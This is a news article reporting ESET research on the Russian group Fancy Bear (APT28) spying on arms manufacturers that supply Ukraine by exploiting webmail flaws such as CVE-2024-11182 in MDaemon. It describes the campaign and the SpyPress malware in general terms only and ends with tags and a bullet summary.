Cyberespionage: Fancy Bear Takes On Ukraine's Arms Suppliers
Cybercriminals focus their attacks on Ukrainian weapons manufacturers - Cybercriminals prey on Ukrainian weapon suppliers
Get ready for a lowdown on the latest cyberattack troubling Ukraine, courtesy of the infamous Russian hacker gang, Fancy Bear. A recent study by ESET, a cybersecurity firm based in Bratislava, Slovakia, has shed some light on this chilling scenario. This dodgy group has launched a targeted offensive against arms manufacturers arming Ukraine in its battle against Russia's aggressive invasion. Manufacturers of Soviet-era weaponry from Bulgaria, Romania, and Ukraine to arms factories in Africa and South America have been in their crosshairs.
Fancy Bear, also known by aliases such as Sednit or APT28, has a history of questionable deeds, including attacks on the German Bundestag (2015), US politician Hillary Clinton (2016), and the SPD headquarters (2023). experts consider them an extension of Russian intelligence services employing cyberattacks as instruments for political influence and destabilization. Their repertoire includes espionage and targeted disinformation campaigns against Western democracies.
Operation RoundPress to the Rescue?
Cyberattacks by Fancy Bear are often disguised as news articles from credible sources like the Kyiv Post or the Bulgarian news portal News.bg. In this current espionage campaign, trouble started as they identified weaknesses in popular webmail software, such as Roundcube, Zimbra, Horde, and MDaemon. Many of these vulnerabilities could have been patched had companies diligently performed software maintenance. However, in some instances, affected companies were at a loss as the attackers exploited an undiscovered security flaw in MDaemon, a vulnerability named CVE-2024-11182, which surfaced in November 2024[1][2][3][5].
Once these manipulated emails were opened in a browser, hidden malware was activated, skirting spam filters. According to ESET researchers, the malware they tagged as SpyPress.MDAEMON can pilfer credentials, monitor emails, and even subvert two-factor authentication (2FA), an extra layer of security requiring a second form of identification besides a password. However, Fancy Bear hackers managed to outwit 2FA in multiple instances by employing application passwords for persistent access to email accounts.
"Many companies neglect their webmail servers' maintenance," states ESET researcher Matthieu Faou. "Merely reading an email on a browser can execute malware, without the recipient actively clicking anything."
- Cybersecurity
- Ukraine
- Hacker group
- Bratislava
- Arms companies
- Russia
- Software flaws
- Bulgaria
- Romania
- Africa
- South America
- Bundestag
- Hillary Clinton
- SPD
- Webmail servers
- Spyware
- Soviet-era weapons
- Cyberattacks for political influence
- CVE-2024-11182
- The hacker group Fancy Bear, based in Russia, launched a targeted offensive against arms manufacturers in EC countries like Ukraine, Bulgaria, Romania, as well as regions in Africa and South America, to gain access to sensitive information related to Soviet-era weapons.
- ESET, a cybersecurity firm based in Bratislava, Slovakia, revealed that Fancy Bear disguised their cyberattacks as news articles from credible sources and exploited software flaws in popular webmail software, including Roundcube, Zimbra, Horde, and MDaemon, with one such vulnerability being CVE-2024-11182, a security flaw identified in November 2024.
- Matthieu Faou, a researcher at ESET, stated that many companies neglected their webmail servers' maintenance, making it possible for merely opening a manipulated email on a browser to execute malware, bypassing spam filters and even subverting two-factor authentication (2FA).
